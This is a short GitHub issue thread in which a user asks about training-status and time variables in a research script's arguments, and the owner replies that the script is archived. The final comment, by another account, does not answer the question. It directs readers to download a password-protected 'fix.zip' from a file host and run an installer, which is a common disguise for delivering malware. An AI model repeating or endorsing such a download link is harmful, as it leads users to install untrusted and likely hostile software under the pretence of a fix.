### ISSUE TITLE
Row 50- In `args_2` and `args_4`  isn't training status untrained at time 1 and trained at time 2? Trained and time contains the same information?

### ISSUE THREAD

**Issue by phoebemma** [phoebemma/resex-lncrna#17]

**Comment by phoebemma** [comment]
This script is very old code and has been archived.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
